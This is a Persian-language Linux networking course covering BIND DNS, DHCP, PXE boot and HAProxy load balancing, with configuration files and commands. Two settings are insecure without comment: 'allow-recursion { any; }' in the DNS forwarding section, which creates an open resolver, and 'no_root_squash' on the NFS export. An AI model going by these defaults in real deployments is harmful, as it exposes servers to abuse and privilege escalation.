۷. لاگ‌گیری و دیباگ BIND

۷.۱ مشاهده لاگ‌های BIND

journalctl -u bind9 --no-pager -n 50

یا

tail -f /var/log/syslog | grep named

۷.۲ فعال‌سازی لاگ در named.conf

افزودن لاگ به /etc/bind/named.conf.options

logging {
    channel default_log {
        file "/var/log/named.log" versions 3 size 5m;
        severity info;
        print-time yes;
        print-severity yes;
        print-category yes;
    };
    category default { default_log; };
};

سپس اجرای:

touch /var/log/named.log
chown bind:bind /var/log/named.log
systemctl restart bind9

---

جمع‌بندی

• BIND یک سرور DNS قدرتمند است که امکان پیاده‌سازی سرور DNS محلی و عمومی را فراهم می‌کند.
• نصب و راه‌اندازی BIND به سادگی از طریق مدیریت بسته لینوکس امکان‌پذیر است.
• برای ایجاد یک DNS محلی، نیاز به تنظیم فایل‌های منطقه‌ای (Zone Files) و تنظیمات دسترسی است.
• می‌توان BIND را به‌عنوان یک سرور کشینگ، فورواردینگ و نام‌گذاری محلی پیکربندی کرد.
• برای دیباگ و مشاهده عملکرد DNS سرور، ابزارهایی مانند dig، nslookup و لاگ‌های named قابل استفاده هستند.

[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”تنظیمات DNS Forwarding و Reverse Lookup Zone” subtitle=”توضیحات کامل”]در بسیاری از شبکه‌ها، سرورهای DNS داخلی برای بهبود عملکرد، افزایش سرعت و کاهش درخواست‌های خروجی به اینترنت از DNS Forwarding استفاده می‌کنند. همچنین، برای بررسی نام دامنه مربوط به یک آدرس IP نیاز به Reverse Lookup Zone داریم که اطلاعات مربوط به برگرداندن IP به نام دامنه را نگه می‌دارد. در این بخش، پیکربندی این دو قابلیت در BIND بررسی خواهد شد.

---

۱. پیکربندی DNS Forwarding در BIND

DNS Forwarding به این معناست که اگر سرور BIND نتواند یک نام دامنه را در Zoneهای خود پیدا کند، درخواست را به یک سرور DNS دیگر ارسال کند.

۱.۱ ویرایش فایل تنظیمات named.conf.options

مسیر فایل: /etc/bind/named.conf.options (در Debian/Ubuntu)
مسیر فایل: /etc/named.conf (در RHEL/CentOS)

nano /etc/bind/named.conf.options

افزودن تنظیمات مربوط به فورواردینگ:

options {
    directory "/var/cache/bind";
    
    recursion yes;
    allow-recursion { any; };

    forwarders {
        8.8.8.8;
        8.8.4.4;
    };
    
    forward only;
    dnssec-validation auto;
};

۱.۲ توضیحات تنظیمات

• recursion yes; → فعال کردن حل بازگشتی برای پردازش درخواست‌های خارجی.
• allow-recursion { any; }; → اجازه استفاده از قابلیت حل بازگشتی برای تمامی کلاینت‌ها.
• forwarders → لیست سرورهای DNS که درخواست‌ها به آن‌ها ارسال می‌شوند.
• forward only; → تمام درخواست‌هایی که در Zone محلی یافت نشوند، فقط به سرورهای فوروارد ارسال شوند.
• dnssec-validation auto; → فعال‌سازی امنیت DNS با DNSSEC.

۱.۳ بررسی و اعمال تنظیمات

named-checkconf
systemctl restart bind9

یا در CentOS/RHEL

systemctl restart named

۱.۴ تست عملکرد فورواردینگ

dig google.com @127.0.0.1

در خروجی، اگر آدرس IP گوگل نمایش داده شد، یعنی فورواردینگ به‌درستی کار می‌کند.

---

۲. پیکربندی Reverse Lookup Zone در BIND

Reverse Lookup Zone برای ترجمه‌ی آدرس‌های IP به نام‌های دامنه استفاده می‌شود. در این بخش، یک Zone معکوس برای شبکه 192.168.1.0/24 ایجاد خواهیم کرد.

۲.۱ افزودن Zone معکوس به named.conf.local

مسیر فایل: /etc/bind/named.conf.local

nano /etc/bind/named.conf.local

افزودن پیکربندی مربوط به Reverse Lookup Zone:

zone "1.168.192.in-addr.arpa" {
    type master;
    file "/etc/bind/db.192.168.1";
};

۲.۲ ایجاد فایل منطقه‌ای Reverse Zone

مسیر فایل: /etc/bind/db.192.168.1

nano /etc/bind/db.192.168.1

افزودن رکوردهای مربوط به ترجمه IP به نام دامنه:

$TTL 86400
@   IN  SOA ns1.example.com. admin.example.com. (
        2024030201  ; Serial
        3600        ; Refresh
        1800        ; Retry
        604800      ; Expire
        86400 )     ; Minimum TTL

@       IN  NS      ns1.example.com.
1       IN  PTR     server1.example.com.
2       IN  PTR     server2.example.com.

۲.۳ تنظیم سطح دسترسی فایل Reverse Zone

chown bind:bind /etc/bind/db.192.168.1
chmod 644 /etc/bind/db.192.168.1

۲.۴ بررسی و راه‌اندازی مجدد سرویس BIND

named-checkconf
named-checkzone 1.168.192.in-addr.arpa /etc/bind/db.192.168.1
systemctl restart bind9

یا در CentOS/RHEL

systemctl restart named

---

۳. تست عملکرد Reverse Lookup Zone

۳.۱ تست با dig

dig -x 192.168.1.1 @127.0.0.1

انتظار داریم خروجی مشابه زیر را دریافت کنیم:

;; ANSWER SECTION:
1.1.168.192.in-addr.arpa. 86400 IN PTR server1.example.com.

۳.۲ تست با nslookup

nslookup 192.168.1.1 127.0.0.1

---

۴. لاگ‌گیری و دیباگ در BIND

۴.۱ بررسی لاگ‌ها

journalctl -u bind9 --no-pager -n 50

یا

tail -f /var/log/syslog | grep named

۴.۲ افزایش سطح لاگ در named.conf

افزودن لاگ به /etc/bind/named.conf.options:

logging {
    channel default_log {
        file "/var/log/named.log" versions 3 size 5m;
        severity info;
        print-time yes;
        print-severity yes;
        print-category yes;
    };
    category default { default_log; };
};

اجرای دستورات زیر برای اعمال تنظیمات:

touch /var/log/named.log
chown bind:bind /var/log/named.log
systemctl restart bind9

---

جمع‌بندی

• DNS Forwarding برای ارسال درخواست‌هایی که در سرور محلی موجود نیستند به یک DNS خارجی مانند Google DNS یا Cloudflare DNS استفاده می‌شود.
• Reverse Lookup Zone برای تبدیل آدرس‌های IP به نام دامنه به کار می‌رود که در شبکه‌های داخلی بسیار مهم است.
• تمامی تنظیمات به‌صورت کامندی و همراه با مسیر فایل‌های مربوطه ارائه شد تا امکان پیاده‌سازی سریع و دقیق وجود داشته باشد.
• ابزارهای dig و nslookup برای تست عملکرد فورواردینگ و Reverse Lookup Zone معرفی شدند.
• برای دیباگ و بررسی عملکرد DNS، روش‌های مشاهده لاگ‌ها و افزایش سطح ثبت گزارشات BIND ارائه شد.

 [/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”ایجاد و مدیریت رکوردهای DNS (A, AAAA, MX, TXT)” subtitle=”توضیحات کامل”]در DNS Server رکوردهای مختلفی برای نام‌گذاری و مسیریابی دامنه‌ها استفاده می‌شود. در این بخش، رکوردهای مهم DNS شامل A، AAAA، MX و TXT را بررسی کرده و نحوه مدیریت این رکوردها در BIND را توضیح خواهیم داد.

---

۱. معرفی رکوردهای DNS و کاربرد آن‌ها

۱.۱ رکورد A

• این رکورد یک نام دامنه را به یک آدرس IPv4 مرتبط می‌کند.

۱.۲ رکورد AAAA

• مشابه A است اما برای آدرس‌های IPv6 استفاده می‌شود.

۱.۳ رکورد MX

• این رکورد مسیر دریافت ایمیل برای یک دامنه را مشخص می‌کند.

۱.۴ رکورد TXT

• این رکورد برای ذخیره اطلاعات متنی مانند احراز هویت SPF، DKIM و تنظیمات خاص استفاده می‌شود.

---

۲. پیکربندی رکوردهای DNS در BIND

۲.۱ ویرایش فایل مربوط به Zone اصلی

مسیر فایل: /etc/bind/db.example.com

nano /etc/bind/db.example.com

افزودن رکوردهای موردنظر:

$TTL 86400
@   IN  SOA ns1.example.com. admin.example.com. (
        2024030301  ; Serial
        3600        ; Refresh
        1800        ; Retry
        604800      ; Expire
        86400 )     ; Minimum TTL

; Name Server
@       IN  NS      ns1.example.com.
ns1     IN  A       192.168.1.10

; A Record (IPv4)
www     IN  A       192.168.1.100
ftp     IN  A       192.168.1.101

; AAAA Record (IPv6)
www     IN  AAAA    2001:db8::1
ftp     IN  AAAA    2001:db8::2

; MX Record (Mail Server)
@       IN  MX 10   mail.example.com.
mail    IN  A       192.168.1.200

; TXT Record (SPF, DKIM, Custom)
@       IN  TXT     "v=spf1 mx -all"
dkim    IN  TXT     "v=DKIM1; k=rsa; p=MIGf...base64encoded..."

۲.۲ تنظیم سطح دسترسی فایل Zone

chown bind:bind /etc/bind/db.example.com
chmod 644 /etc/bind/db.example.com

۲.۳ بررسی صحت پیکربندی و راه‌اندازی مجدد BIND

named-checkzone example.com /etc/bind/db.example.com
systemctl restart bind9

---

۳. تست رکوردهای DNS

۳.۱ بررسی رکورد A

dig www.example.com @127.0.0.1

۳.۲ بررسی رکورد AAAA

dig AAAA www.example.com @127.0.0.1

۳.۳ بررسی رکورد MX

dig MX example.com @127.0.0.1

۳.۴ بررسی رکورد TXT

dig TXT example.com @127.0.0.1

---

جمع‌بندی

• رکوردهای A، AAAA، MX و TXT برای مسیر‌یابی نام دامنه، تعریف میل‌سرور و ذخیره اطلاعات اضافی استفاده می‌شوند.
• در فایل Zone مربوط به دامنه (/etc/bind/db.example.com) رکوردهای DNS اضافه شده و مدیریت شدند.
• دستورات dig برای بررسی صحت تنظیمات به کار گرفته شدند.
• تمامی تنظیمات به‌صورت کامندی و با مسیر فایل‌های مشخص ارائه شدند تا پیاده‌سازی عملی ساده‌تر شود.

[/cdb_course_lesson][cdb_course_lesson title=”DHCP و PXE Boot”][/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”راه‌اندازی سرور DHCP برای تخصیص آدرس IP به دستگاه‌ها” subtitle=”توضیحات کامل”]DHCP (Dynamic Host Configuration Protocol) یک پروتکل مدیریت شبکه است که به‌طور اتوماتیک آدرس‌های IP، تنظیمات DNS و Gateway را به کلاینت‌های شبکه تخصیص می‌دهد. در این بخش، نحوه نصب و پیکربندی یک سرور DHCP با ISC DHCP Server آموزش داده می‌شود.

---

۱. نصب ISC DHCP Server

۱.۱ نصب بسته DHCP Server در لینوکس

برای Ubuntu/Debian:

apt update && apt install isc-dhcp-server -y

برای CentOS/RHEL:

yum install dhcp -y

---

۲. پیکربندی سرور DHCP

۲.۱ ویرایش فایل اصلی تنظیمات DHCP

مسیر فایل: /etc/dhcp/dhcpd.conf

nano /etc/dhcp/dhcpd.conf

۲.۲ تعریف محدوده تخصیص IP (Subnet)

# تنظیمات عمومی DHCP
default-lease-time 600;
max-lease-time 7200;
authoritative;

# تعریف Subnet برای تخصیص IP
subnet 192.168.1.0 netmask 255.255.255.0 {
    range 192.168.1.100 192.168.1.200;
    option routers 192.168.1.1;
    option domain-name-servers 8.8.8.8, 8.8.4.4;
    option broadcast-address 192.168.1.255;
}

۲.۳ تخصیص IP ثابت به دستگاه خاص (Static IP)

host Server1 {
    hardware ethernet AA:BB:CC:DD:EE:FF;
    fixed-address 192.168.1.50;
}

ذخیره تغییرات و خروج از ویرایشگر (CTRL+X → Y → Enter)

۲.۴ تنظیم اینترفیس سرور برای ارائه DHCP

ویرایش فایل: /etc/default/isc-dhcp-server (در Ubuntu/Debian)

nano /etc/default/isc-dhcp-server

اضافه کردن اینترفیس:

INTERFACESv4="eth0"

در CentOS/RHEL مسیر: /etc/sysconfig/dhcpd

nano /etc/sysconfig/dhcpd

و اضافه کردن:

DHCPDARGS=eth0

---

۳. بررسی و راه‌اندازی سرویس DHCP

۳.۱ بررسی صحت پیکربندی

dhcpd -t

۳.۲ راه‌اندازی و فعال‌سازی سرویس DHCP

systemctl restart isc-dhcp-server
systemctl enable isc-dhcp-server

برای CentOS/RHEL:

systemctl restart dhcpd
systemctl enable dhcpd

---

۴. بررسی عملکرد DHCP Server

۴.۱ مشاهده لیست کلاینت‌های متصل

cat /var/lib/dhcp/dhcpd.leases

۴.۲ بررسی لاگ‌های DHCP

journalctl -u isc-dhcp-server --no-pager | tail -20

در CentOS/RHEL:

journalctl -u dhcpd --no-pager | tail -20

۴.۳ تست دریافت IP از کلاینت

در یک کلاینت لینوکسی:

dhclient -v eth0

---

جمع‌بندی

• ابتدا بسته ISC DHCP Server نصب شد.
• در فایل /etc/dhcp/dhcpd.conf تنظیمات Subnet و آدرس‌های Static و Dynamic پیکربندی شدند.
• اینترفیس شبکه برای ارائه DHCP مشخص شد.
• سرویس DHCP بررسی، راه‌اندازی و فعال‌ شد.
• تست‌های مشاهده لیست کلاینت‌ها، بررسی لاگ‌ها و دریافت IP از کلاینت انجام شد.

[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”پیکربندی PXE Boot برای راه‌اندازی سیستم‌های از راه دور” subtitle=”توضیحات کامل”]PXE (Preboot Execution Environment) یک روش برای بوت کردن سیستم‌ها از طریق شبکه بدون نیاز به دیسک فیزیکی یا USB است. این روش برای نصب خودکار سیستم‌عامل روی کلاینت‌ها، راه‌اندازی سرورهای بدون دیسک و مدیریت سیستم‌ها در محیط‌های سازمانی کاربرد دارد.

در این بخش، نحوه راه‌اندازی یک سرور PXE برای بوت سیستم‌ها از راه دور آموزش داده می‌شود. این تنظیمات شامل DHCP، TFTP و NFS/HTTP خواهد بود.

---

۱. نصب و راه‌اندازی سرویس‌های موردنیاز

PXE برای کارکرد نیاز به سه سرویس اصلی دارد:

• DHCP Server: برای تخصیص آدرس IP و ارسال اطلاعات بوت
• TFTP Server: برای ارائه فایل‌های بوت اولیه
• NFS یا HTTP Server: برای ارائه فایل‌های نصبی سیستم‌عامل

۱.۱ نصب بسته‌های موردنیاز

برای Ubuntu/Debian:

apt update && apt install -y isc-dhcp-server tftpd-hpa syslinux nfs-kernel-server apache2

برای CentOS/RHEL:

yum install -y dhcp-server tftp-server syslinux nfs-utils httpd

---

۲. پیکربندی DHCP برای PXE

۲.۱ ویرایش فایل پیکربندی DHCP

مسیر فایل: /etc/dhcp/dhcpd.conf

nano /etc/dhcp/dhcpd.conf

افزودن تنظیمات زیر:

subnet 192.168.1.0 netmask 255.255.255.0 {
    range 192.168.1.100 192.168.1.200;
    option routers 192.168.1.1;
    option domain-name-servers 8.8.8.8;
    next-server 192.168.1.10;  # آدرس سرور PXE
    filename "pxelinux.0";  # فایل بوت PXE
}

۲.۲ راه‌اندازی و فعال‌سازی سرویس DHCP

systemctl restart isc-dhcp-server
systemctl enable isc-dhcp-server

در CentOS/RHEL:

systemctl restart dhcpd
systemctl enable dhcpd

---

۳. پیکربندی TFTP برای ارائه فایل‌های بوت

۳.۱ ویرایش تنظیمات TFTP

مسیر فایل: /etc/default/tftpd-hpa

nano /etc/default/tftpd-hpa

افزودن تنظیمات زیر:

TFTP_USERNAME="tftp"
TFTP_DIRECTORY="/var/lib/tftpboot"
TFTP_ADDRESS="0.0.0.0:69"
TFTP_OPTIONS="--secure"

۳.۲ ایجاد دایرکتوری و کپی فایل‌های بوت

mkdir -p /var/lib/tftpboot
cp /usr/lib/PXELINUX/pxelinux.0 /var/lib/tftpboot/
cp /usr/lib/syslinux/modules/bios/* /var/lib/tftpboot/

۳.۳ راه‌اندازی و فعال‌سازی TFTP

systemctl restart tftpd-hpa
systemctl enable tftpd-hpa

در CentOS/RHEL:

systemctl restart tftp
systemctl enable tftp

---

۴. پیکربندی منوی بوت PXE

۴.۱ ایجاد پوشه مربوط به منوی بوت

mkdir -p /var/lib/tftpboot/pxelinux.cfg

۴.۲ ایجاد فایل default برای منوی بوت

مسیر فایل: /var/lib/tftpboot/pxelinux.cfg/default

nano /var/lib/tftpboot/pxelinux.cfg/default

افزودن محتوای زیر:

DEFAULT menu.c32
PROMPT 0
TIMEOUT 100
ONTIMEOUT install

MENU TITLE PXE Boot Menu
LABEL install
    MENU LABEL Install Ubuntu
    KERNEL ubuntu/vmlinuz
    APPEND initrd=ubuntu/initrd.gz netboot=nfs nfsroot=192.168.1.10:/nfs/ubuntu/

---

۵. راه‌اندازی NFS برای ارائه فایل‌های نصبی

۵.۱ ایجاد دایرکتوری و کپی فایل‌های سیستم‌عامل

mkdir -p /nfs/ubuntu
mount -o loop ubuntu.iso /mnt
cp -r /mnt/* /nfs/ubuntu/
umount /mnt

۵.۲ ویرایش فایل تنظیمات NFS

مسیر فایل: /etc/exports

nano /etc/exports

اضافه کردن:

/nfs/ubuntu 192.168.1.0/24(ro,sync,no_root_squash)

۵.۳ راه‌اندازی و فعال‌سازی NFS

systemctl restart nfs-kernel-server
systemctl enable nfs-kernel-server
exportfs -a

در CentOS/RHEL:

systemctl restart nfs
systemctl enable nfs
exportfs -a

---

۶. بررسی و تست PXE Boot

۶.۱ بررسی سرویس‌های اجرا شده

systemctl status isc-dhcp-server
systemctl status tftpd-hpa
systemctl status nfs-kernel-server

۶.۲ بررسی لاگ‌های DHCP برای دریافت درخواست PXE

journalctl -u isc-dhcp-server --no-pager | tail -20

۶.۳ تست بوت کلاینت از طریق PXE

• کلاینت را در BIOS یا UEFI روی Boot from Network تنظیم کنید.
• سیستم را ریستارت کنید و مشاهده کنید که کلاینت از طریق TFTP فایل بوت دریافت کرده و وارد منوی PXE می‌شود.

---

جمع‌بندی

• ابتدا بسته‌های DHCP، TFTP، NFS و HTTP نصب شدند.
• DHCP Server برای ارسال فایل بوت PXE پیکربندی شد.
• TFTP Server برای ارائه فایل‌های بوت تنظیم شد.
• منوی بوت PXE برای انتخاب سیستم‌عامل تعریف شد.
• NFS برای ارائه فایل‌های نصبی سیستم‌عامل راه‌اندازی شد.
• در نهایت، سرویس‌ها راه‌اندازی شدند و کلاینت‌ها از طریق PXE بوت شدند.

[/cdb_course_lesson][cdb_course_lesson title=”Load Balancing با HAProxy”][/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”نصب و پیکربندی HAProxy برای Load Balancing ترافیک شبکه” subtitle=”توضیحات کامل”]HAProxy یک Load Balancer قدرتمند و رایگان است که برای توزیع بار ترافیک شبکه بین چندین سرور استفاده می‌شود. این ابزار به دلیل کارایی بالا، مقیاس‌پذیری و پشتیبانی از TCP و HTTP در سطح گسترده‌ای در سازمان‌ها و دیتاسنترها مورد استفاده قرار می‌گیرد.

در این بخش، نحوه نصب، پیکربندی و راه‌اندازی HAProxy برای متعادل‌سازی ترافیک بین چند سرور وب آموزش داده خواهد شد.

---

۱. نصب HAProxy

۱.۱ نصب در Ubuntu/Debian

apt update && apt install -y haproxy

۱.۲ نصب در CentOS/RHEL

yum install -y haproxy

---

۲. پیکربندی اولیه HAProxy

۲.۱ تنظیمات کلی در فایل پیکربندی

مسیر فایل: /etc/haproxy/haproxy.cfg

nano /etc/haproxy/haproxy.cfg

تنظیمات کلی شامل بخش‌های global، defaults، frontend و backend می‌شود.

۲.۲ پیکربندی بخش Global

global
    log /dev/log local0
    log /dev/log local1 notice
    chroot /var/lib/haproxy
    stats socket /run/haproxy/admin.sock mode 660 level admin
    stats timeout 30s
    user haproxy
    group haproxy
    daemon
    maxconn 4096

۲.۳ تنظیمات پیش‌فرض (defaults)

defaults
    log global
    mode http
    option httplog
    option dontlognull
    timeout connect 5s
    timeout client 50s
    timeout server 50s

---

۳. راه‌اندازی Load Balancer برای ترافیک HTTP

۳.۱ تعریف frontend برای دریافت درخواست‌ها

این بخش تعیین می‌کند که درخواست‌ها روی کدام پورت دریافت شوند.

frontend http_front
    bind *:80
    default_backend web_servers

۳.۲ تعریف backend برای توزیع بار بین سرورها

در اینجا دو سرور وب با آدرس‌های 192.168.1.101 و 192.168.1.102 معرفی شده‌اند.

backend web_servers
    balance roundrobin
    server web1 192.168.1.101:80 check
    server web2 192.168.1.102:80 check

۳.۳ فعال‌سازی صفحه مانیتورینگ HAProxy

listen stats
    bind *:8080
    stats enable
    stats uri /haproxy?stats
    stats refresh 5s

---

۴. راه‌اندازی و تست HAProxy

۴.۱ بررسی تنظیمات HAProxy برای یافتن خطاهای احتمالی

haproxy -c -f /etc/haproxy/haproxy.cfg

۴.۲ راه‌اندازی و فعال‌سازی سرویس HAProxy

systemctl restart haproxy
systemctl enable haproxy

۴.۳ بررسی وضعیت سرویس

systemctl status haproxy

۴.۴ تست Load Balancing

در مرورگر، آدرس سرور HAProxy را وارد کنید:

http://<haproxy-ip>/

هر بار که صفحه را رفرش کنید، درخواست‌ها بین دو سرور web1 و web2 تقسیم می‌شود.

۴.۵ مشاهده داشبورد مانیتورینگ

در مرورگر:

http://<haproxy-ip>:8080/haproxy?stats

---

۵. بهینه‌سازی و امنیت HAProxy

۵.۱ فعال‌سازی KeepAlive برای کاهش تأخیر ارتباطات

option http-server-close
option forwardfor except 127.0.0.1

۵.۲ محدود کردن تعداد ارتباطات همزمان برای جلوگیری از حملات DDoS

backend web_servers
    balance roundrobin
    stick-table type ip size 200k expire 10m
    http-request track-sc1 src
    http-request deny if { sc_http_req_rate(0) gt 100 }

---

جمع‌بندی

• ابتدا HAProxy نصب شد.
• تنظیمات Load Balancing برای HTTP روی دو سرور انجام شد.
• داشبورد مانیتورینگ برای مشاهده وضعیت سرورها فعال شد.
• بهینه‌سازی‌های امنیتی و بهبود عملکرد اضافه شد.

با این تنظیمات، HAProxy می‌تواند ترافیک ورودی را به‌صورت متعادل بین سرورها توزیع کند و با پیکربندی‌های اضافه، امنیت و کارایی را بهبود دهد.[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”پیکربندی سرورهای مختلف به عنوان Backend در HAProxy” subtitle=”توضیحات کامل”]در HAProxy، امکان تعریف چندین نوع سرور Backend برای مدیریت بار و توزیع درخواست‌ها وجود دارد. بسته به نیاز سرویس، نوع پروتکل و استراتژی Load Balancing، می‌توان Backendهای مختلفی را تنظیم کرد.

در این بخش، نحوه پیکربندی Backend برای وب‌سرورها، سرورهای دیتابیس، سرورهای API و سرورهای Mail را بررسی خواهیم کرد.

---

۱. پیکربندی Backend برای وب‌سرورها

۱.۱ ویرایش فایل پیکربندی HAProxy

مسیر فایل: /etc/haproxy/haproxy.cfg

nano /etc/haproxy/haproxy.cfg

۱.۲ تعریف frontend برای دریافت درخواست‌های HTTP

frontend http_front
    bind *:80
    default_backend web_servers

۱.۳ پیکربندی backend برای توزیع بار بین سرورهای وب

backend web_servers
    balance roundrobin
    server web1 192.168.1.101:80 check
    server web2 192.168.1.102:80 check
    server web3 192.168.1.103:80 check backup

• roundrobin: روش چرخشی برای توزیع درخواست‌ها بین سرورها.
• check: بررسی سلامت سرورها قبل از ارسال درخواست.
• backup: این سرور تنها در صورت از کار افتادن سایر سرورها فعال خواهد شد.

---

۲. پیکربندی Backend برای سرورهای API

۲.۱ تعریف frontend برای API Gateway

frontend api_front
    bind *:8080
    default_backend api_servers

۲.۲ پیکربندی backend برای API Servers

backend api_servers
    balance leastconn
    option httpchk GET /health
    server api1 192.168.1.201:8080 check
    server api2 192.168.1.202:8080 check
    server api3 192.168.1.203:8080 check

• leastconn: درخواست‌ها به سروری ارسال می‌شوند که کمترین ارتباط فعال را دارد.
• option httpchk: بررسی سلامت سرورها با ارسال یک درخواست GET /health.

---

۳. پیکربندی Backend برای سرورهای دیتابیس (MySQL, PostgreSQL)

۳.۱ تعریف frontend برای اتصال به دیتابیس

frontend db_front
    bind *:3306
    default_backend db_servers

۳.۲ پیکربندی backend برای توزیع بار بین سرورهای دیتابیس

backend db_servers
    balance source
    mode tcp
    option mysql-check user haproxy
    server db1 192.168.1.151:3306 check
    server db2 192.168.1.152:3306 check backup

• balance source: درخواست‌های هر کلاینت همیشه به یک سرور مشخص ارسال می‌شود.
• mode tcp: برای مدیریت اتصال‌های سطح پایین به دیتابیس ضروری است.
• option mysql-check user haproxy: بررسی سلامت سرور MySQL با یوزر مخصوص HAProxy.

---

۴. پیکربندی Backend برای سرورهای Mail (SMTP, IMAP, POP3)

۴.۱ تعریف frontend برای سرویس‌های ایمیل

frontend mail_front
    bind *:25
    default_backend smtp_servers

۴.۲ پیکربندی backend برای توزیع بار بین سرورهای SMTP

backend smtp_servers
    balance roundrobin
    mode tcp
    option smtpchk
    server smtp1 192.168.2.10:25 check
    server smtp2 192.168.2.11:25 check

۴.۳ پیکربندی backend برای توزیع بار بین سرورهای IMAP

backend imap_servers
    balance roundrobin
    mode tcp
    server imap1 192.168.2.20:143 check
    server imap2 192.168.2.21:143 check

---

۵. راه‌اندازی و تست تنظیمات

۵.۱ بررسی تنظیمات HAProxy

haproxy -c -f /etc/haproxy/haproxy.cfg

۵.۲ راه‌اندازی مجدد HAProxy برای اعمال تغییرات

systemctl restart haproxy
systemctl enable haproxy

۵.۳ بررسی وضعیت سرویس

systemctl status haproxy

---

جمع‌بندی

• Backendهای مختلفی برای وب، API، دیتابیس و ایمیل تنظیم شد.
• از استراتژی‌های متفاوتی برای Load Balancing هر نوع سرویس استفاده شد.
• بهینه‌سازی‌های لازم مانند health check و failover انجام شد.

این تنظیمات امکان افزایش کارایی، در دسترس بودن و مقیاس‌پذیری سرورها را فراهم می‌کنند.[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”استفاده از روش‌های مختلف Load Balancing (Round Robin، Least Connections)” subtitle=”توضیحات کامل”]Load Balancing یکی از مهم‌ترین تکنیک‌های بهینه‌سازی شبکه است که باعث توزیع بار ترافیک بین چندین سرور می‌شود. در HAProxy، چندین روش توزیع بار وجود دارد که دو مورد از رایج‌ترین آن‌ها Round Robin و Least Connections هستند.

در این بخش، نحوه پیاده‌سازی این دو روش در HAProxy همراه با مثال‌های عملی و تنظیمات کامل بررسی خواهد شد.

---

۱. روش Round Robin

۱.۱ معرفی روش Round Robin

• در این روش، درخواست‌ها به صورت چرخشی بین سرورها توزیع می‌شوند.
• مناسب برای سرورهایی با قدرت پردازشی یکسان و بار متوازن.

۱.۲ ویرایش فایل پیکربندی HAProxy

مسیر فایل: /etc/haproxy/haproxy.cfg

nano /etc/haproxy/haproxy.cfg

۱.۳ پیکربندی frontend برای دریافت درخواست‌های HTTP

frontend http_front
    bind *:80
    default_backend web_servers_round_robin

۱.۴ پیکربندی backend با روش Round Robin

backend web_servers_round_robin
    balance roundrobin
    server web1 192.168.1.101:80 check
    server web2 192.168.1.102:80 check
    server web3 192.168.1.103:80 check

۱.۵ راه‌اندازی و تست تنظیمات

haproxy -c -f /etc/haproxy/haproxy.cfg
systemctl restart haproxy

۱.۶ تست روش Round Robin

برای تست، می‌توان چندین درخواست را به HAProxy ارسال کرد:

curl -I http://your-load-balancer-ip

در پاسخ، خواهید دید که درخواست‌ها به صورت چرخشی بین سرورها توزیع می‌شوند.

---

۲. روش Least Connections

۲.۱ معرفی روش Least Connections

• در این روش، درخواست جدید به سروری که کمترین تعداد اتصال فعال را دارد ارسال می‌شود.
• مناسب برای سرورهایی با قدرت پردازشی مختلف و درخواست‌های با پردازش طولانی.

۲.۲ ویرایش فایل پیکربندی HAProxy

مسیر فایل: /etc/haproxy/haproxy.cfg

nano /etc/haproxy/haproxy.cfg

۲.۳ پیکربندی frontend برای دریافت درخواست‌های API

frontend api_front
    bind *:8080
    default_backend api_servers_least_conn

۲.۴ پیکربندی backend با روش Least Connections

backend api_servers_least_conn
    balance leastconn
    option httpchk GET /health
    server api1 192.168.1.201:8080 check
    server api2 192.168.1.202:8080 check
    server api3 192.168.1.203:8080 check

۲.۵ راه‌اندازی و تست تنظیمات

haproxy -c -f /etc/haproxy/haproxy.cfg
systemctl restart haproxy

۲.۶ تست روش Least Connections

با ارسال چندین درخواست و بررسی لاگ سرورها، خواهید دید که سروری که کمترین اتصال فعال را دارد، درخواست جدید را دریافت می‌کند.

---

جمع‌بندی

• روش Round Robin درخواست‌ها را به صورت چرخشی بین سرورها توزیع می‌کند.
• روش Least Connections درخواست‌ها را به سروری ارسال می‌کند که کمترین تعداد اتصال فعال را دارد.
• هر دو روش بسته به نوع سرویس، بار سرور و نیاز سیستم انتخاب می‌شوند.

این تنظیمات باعث بهینه‌سازی ترافیک شبکه و افزایش پایداری و کارایی سرورها می‌شوند.[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”تنظیمات پیشرفته HAProxy مانند SSL Termination و Health Checks” subtitle=”توضیحات کامل”]HAProxy به عنوان یک Load Balancer قوی، قابلیت‌های پیشرفته‌ای از جمله SSL Termination و Health Checks را فراهم می‌کند.

• SSL Termination برای رمزگشایی درخواست‌های HTTPS در HAProxy قبل از ارسال آن‌ها به سرورهای backend استفاده می‌شود. این کار باعث کاهش فشار روی سرورهای backend و افزایش عملکرد کلی می‌شود.
• Health Checks در HAProxy به بررسی سلامت سرورهای backend پرداخته و در صورت از کار افتادن یک سرور، آن را از لیست سرورهای فعال خارج می‌کند.

---

۱. تنظیمات SSL Termination در HAProxy

۱.۱ ایجاد یا دریافت یک گواهینامه SSL

برای استفاده از SSL در HAProxy، ابتدا باید یک گواهینامه SSL معتبر داشته باشید. می‌توانید از Let’s Encrypt استفاده کنید یا یک گواهینامه خودامضا ایجاد کنید.

۱.۲ ایجاد گواهینامه خودامضا

openssl req -new -newkey rsa:2048 -days 365 -nodes -x509 -keyout /etc/ssl/private/haproxy.key -out /etc/ssl/certs/haproxy.crt

۱.۳ ادغام کلید خصوصی و گواهینامه در یک فایل

cat /etc/ssl/private/haproxy.key /etc/ssl/certs/haproxy.crt > /etc/ssl/private/haproxy.pem

۱.۴ ویرایش پیکربندی HAProxy برای پشتیبانی از SSL

مسیر فایل: /etc/haproxy/haproxy.cfg

nano /etc/haproxy/haproxy.cfg

۱.۵ پیکربندی HAProxy برای SSL Termination

frontend https_front
    bind *:443 ssl crt /etc/ssl/private/haproxy.pem
    default_backend web_servers_ssl

backend web_servers_ssl
    balance roundrobin
    server web1 192.168.1.101:80 check
    server web2 192.168.1.102:80 check

۱.۶ تست تنظیمات و راه‌اندازی مجدد HAProxy

haproxy -c -f /etc/haproxy/haproxy.cfg
systemctl restart haproxy

۱.۷ تست SSL با Curl

curl -I https://your-domain.com --insecure

در پاسخ باید هدرهای HTTPS دریافت شوند که نشان‌دهنده موفقیت‌آمیز بودن تنظیمات SSL است.

---

